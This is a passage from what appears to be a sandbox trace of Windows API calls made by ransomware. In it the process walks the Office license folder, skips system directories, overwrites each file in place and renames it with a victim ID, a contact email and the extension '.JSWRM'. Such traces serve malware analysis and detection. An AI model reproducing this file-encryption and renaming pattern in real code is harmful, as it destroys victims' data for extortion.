(lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0108.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0108.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0108.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0108.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0108.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0108.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0108.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0108.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0108.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0108.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0108.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.872] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11649) returned 1 [0108.872] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0108.872] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0108.874] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.874] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0108.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.874] CloseHandle (hObject=0x45c) returned 1 [0108.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0108.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0108.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0108.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0108.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0108.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0108.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.875] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0108.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0108.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0108.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.876] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9e7c5cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9e7c5cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9f14f18, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusMSDNR_Retail-pl.xrm-ms", cAlternateFileName="PR4CD4~1.XRM")) returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.876] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0108.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0108.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0108.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0108.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0108.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0108.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0108.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0108.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0108.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0108.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.877] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10651) returned 1 [0108.877] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0108.878] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0108.880] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.880] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0108.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.880] CloseHandle (hObject=0x45c) returned 1 [0108.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0108.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0108.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0108.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0108.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0108.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0108.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0108.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0108.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0108.881] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9e300f0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9e300f0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9ec8a7a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusMSDNR_Retail-ppd.xrm-ms", cAlternateFileName="PROPLU~3.XRM")) returned 1 [0108.881] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0108.881] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0108.881] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0108.881] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0108.881] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.882] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.882] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.882] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.882] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.882] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0108.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0108.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.883] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24369) returned 1 [0108.883] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24c1d0 [0108.883] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f30, lpOverlapped=0x0) returned 1 [0108.886] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.886] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f30, lpOverlapped=0x0) returned 1 [0108.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.886] CloseHandle (hObject=0x45c) returned 1 [0108.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0108.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0108.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0108.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0108.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0108.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0108.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.886] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0108.888] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9e09eee, 